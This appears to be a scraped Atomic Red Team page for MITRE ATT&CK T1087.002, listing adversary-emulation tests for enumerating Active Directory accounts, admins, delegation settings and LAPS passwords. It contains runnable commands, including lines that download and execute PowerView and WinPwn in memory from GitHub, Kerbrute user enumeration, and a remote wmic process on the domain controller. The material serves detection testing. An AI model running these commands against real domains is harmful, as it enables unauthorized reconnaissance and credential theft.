Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. Commands such asnet user /domain
andnet group /domain
of the [Net](https://attack.mitre.org/software/S0039) utility,dscacheutil -q group
on macOS, andldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets includingGet-ADUser
andGet-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)
Atomic Test #2 - Enumerate all accounts via PowerShell (Domain)
Atomic Test #7 - Adfind - Enumerate Active Directory User Objects
Atomic Test #8 - Adfind - Enumerate Active Directory Exchange AD Objects
Atomic Test #9 - Enumerate Default Domain Admin Details (Domain)
Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation
Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher
Atomic Test #13 - Enumerate Linked Policies In ADSISearcher Discovery
Atomic Test #14 - Enumerate Root Domain linked policies Discovery
Atomic Test #18 - Suspicious LAPS Attributes Query with Get-ADComputer all properties
Atomic Test #19 - Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
Atomic Test #21 - Suspicious LAPS Attributes Query with adfind all properties
Atomic Test #22 - Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
Supported Platforms: Windows
auto_generated_guid: 6fbc9e68-5ad7-444a-bd11-8bf3136c477e
1
command_prompt
!net user /domain
net group /domain
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
Supported Platforms: Windows
auto_generated_guid: 8b8a6449-be98-4f42-afd2-dedddc7453b2
1
powershell
!1
2
3
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
Supported Platforms: Windows
auto_generated_guid: 161dcd85-d014-4f5e-900c-d3eaae82a0f7
| Name | Description | Type | Default Value | |——|————-|——|—————| | computer_name | Name of remote system to query | string | %COMPUTERNAME%|
1
command_prompt
!query user /SERVER:#{computer_name}
ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed.
Supported Platforms: Windows
auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59
| Name | Description | Type | Default Value | |——|————-|——|—————| | adrecon_path | Path of ADRecon.ps1 file | path | PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1|
1
powershell
!1
Invoke-Expression "#{adrecon_path}"
1
Get-ChildItem "PathToAtomicsFolder\..\ExternalPayloads" -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
1
powershell
!1
if (Test-Path "#{adrecon_path}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "#{adrecon_path}"
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
Supported Platforms: Windows
auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
| Name | Description | Type | Default Value | |——|————-|——|—————| | optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use “-arg” notation to add arguments separated by spaces. | string | |
1
command_prompt
!"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
1
powershell
!1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
Supported Platforms: Windows
auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a
| Name | Description | Type | Default Value | |——|————-|——|—————| | optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use “-arg” notation to add arguments separated by spaces. | string | |
1
command_prompt
!"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
1
powershell
!1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Supported Platforms: Windows
auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
| Name | Description | Type | Default Value | |——|————-|——|—————| | optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use “-arg” notation to add arguments separated by spaces. | string | |
1
command_prompt
!"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
1
powershell
!1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Supported Platforms: Windows
auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99
| Name | Description | Type | Default Value | |——|————-|——|—————| | optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use “-arg” notation to add arguments separated by spaces. | string | |
1
command_prompt
!"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
1
powershell
!1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
This test will enumerate the details of the built-in domain admin account
Supported Platforms: Windows
auto_generated_guid: c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
1
command_prompt
!net user administrator /domain
Attackers may attempt to query for computer objects with the UserAccountControl property ‘TRUSTED_FOR_DELEGATION’ (0x80000;524288) set More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
Supported Platforms: Windows
auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
| Name | Description | Type | Default Value | |——|————-|——|—————| | domain | Domain FQDN | string | $env:UserDnsDomain| | uac_prop | UAC Property to search | integer | 524288|
1
powershell
!1
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
1
powershell
!1
2
3
4
5
6
7
Try {
Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
exit 0
}
Catch {
exit 1
}
1
2
3
4
5
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
Install-WindowsFeature RSAT-AD-PowerShell
}
Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
Supported Platforms: Windows
auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
1
powershell
!1
2
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
Supported Platforms: Windows
auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
1
powershell
!1
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
Supported Platforms: Windows
auto_generated_guid: 7ab0205a-34e4-4a44-9b04-e1541d1a57be
1
powershell
!1
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
Supported Platforms: Windows
auto_generated_guid: 00c652e2-0750-4ca6-82ff-0204684a6fe4
1
powershell
!1
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
Gathers general domain information using the generaldomaininfo function of WinPwn
Supported Platforms: Windows
auto_generated_guid: ce483c35-c74b-45a7-a670-631d1e69db3d
1
powershell
!1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Enumerates active directory usernames using the userenum function of Kerbrute
Supported Platforms: Windows
auto_generated_guid: f450461c-18d1-4452-9f0d-2c42c3f08624
| Name | Description | Type | Default Value | |——|————-|——|—————| | Domain | Domain that is being tested against | string | $env:USERDOMAIN| | DomainController | Domain Controller that is being tested against | string | $env:UserDnsDomain|
1
powershell
!1
2
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
1
powershell
!1
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
1
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\username.txt"){exit 0} else {exit 1}
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
This test discovers users who have authenticated against a Domain Controller via NTLM. This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. Reference
Supported Platforms: Windows
auto_generated_guid: b8a563d4-a836-4993-a74e-0a19b8481bfe
1
powershell
!1
2
3
4
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
1
Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Supported Platforms: Windows
auto_generated_guid: 394012d9-2164-4d4f-b9e5-acf30ba933fe
| Name | Description | Type | Default Value | |——|————-|——|—————| | hostname | Name of the host | string | $env:computername|
1
powershell
!1
Get-ADComputer #{hostname} -Properties *
This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Supported Platforms: Windows
auto_generated_guid: 6e85bdf9-7bc4-4259-ac0f-f0cb39964443
| Name | Description | Type | Default Value | |——|————-|——|—————| | hostname | Name of the host | string | $env:computername|
1
powershell
!1
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Supported Platforms: Windows
auto_generated_guid: ffbcfd62-15d6-4989-a21a-80bfc8e58bb5
1
powershell
!1
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Supported Platforms: Windows
auto_generated_guid: abf00f6c-9983-4d9a-afbc-6b1c6c6448e1
| Name | Description | Type | Default Value | |——|————-|——|—————| | optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use “-arg” notation to add arguments separated by spaces. | string | | | domain | Domain of the host | string | $env:USERDOMAIN|
1
powershell
!1
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
This test executes LDAP query using adfind command and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Supported Platforms: Windows
auto_generated_guid: 51a98f96-0269-4e09-a10f-e307779a8b05
| Name | Description | Type | Default Value | |——|————-|——|—————| | optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use “-arg” notation to add arguments separated by spaces. | string | | | domain | Domain of the host | string | $env:USERDOMAIN|
1
powershell
!1
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
Supported Platforms: Linux
auto_generated_guid: 096b6d2a-b63f-4100-8fa0-525da4cd25ca
| Name | Description | Type | Default Value | |——|————-|——|—————| | domain | The domain to be tested | string | example| | top_level_domain | The top level domain (.com, .test, .remote, etc… following domain, minus the .) | string | test| | user | username@domain of a user within the ad database | string | user@example.test| | password | password of the user with admin privileges referenced in admin_user | string | s3CurePssw0rD!|
1
sh
!1
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
1
sh
!1
which ldapsearch
1
echo ldapsearch not found
This test uses LDAPDomainDump to perform account enumeration on a domain. Reference
Supported Platforms: Linux
auto_generated_guid: a54d497e-8dbe-4558-9895-44944baa395f
| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username and domain to authenticate with | string | domain\user| | target_ip | IP to connect to | string | 127.0.0.1| | password | Password to authenticate with | string | password|
1
sh
!1
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
1
rm -rf /tmp/T1087/ 2>/dev/null
1
sh
!1
if [ -x "$(command -v python3 --version)" ]; then exit 0; else exit 1; fi;
1
sudo apt-get -y install python3
1
if [ -x "$(command -v pip --version)" ]; then exit 0; else exit 1; fi;
1
2
wget -O /tmp/get-pip.py https://bootstrap.pypa.io/pip/3.6/get-pip.py
python3 /tmp/get-pip.py
1
python3 -c 'import ldapdomaindump' 2>/dev/null
1
pip install ldapdomaindump
1
python3 -c 'import future' 2>/dev/null
1
pip install future